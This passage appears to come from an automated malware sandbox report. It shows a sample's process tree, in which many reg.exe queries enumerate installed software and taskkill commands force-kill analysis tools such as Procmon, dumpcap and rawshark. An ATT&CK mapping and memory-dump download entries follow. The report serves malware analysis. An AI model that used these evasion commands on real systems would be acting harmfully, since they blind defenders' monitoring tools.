    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1300
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2100
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1828
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:2200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:2392
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:2508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:2528
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:2544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:2576
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:2436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:2292
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2088
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:2708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:2592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:2812
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:2448
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:2144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2740
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:2824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:2068
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:2872
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:2992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:3028
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:2432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:2320
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2056
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:2052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:1124
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:2940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:1356
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:1752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:652

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1540-61-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/1540-62-0x000000001AD40000-0x000000001AD41000-memory.dmp

Filesize
4KB

Download
memory/1540-31-0x000007FEF6A60000-0x000007FEF744C000-memory.dmp

Filesize
9.9MB

Download
memory/1540-66-0x00000000022B0000-0x00000000022B1000-memory.dmp

Filesize
4KB

Download
memory/1540-76-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download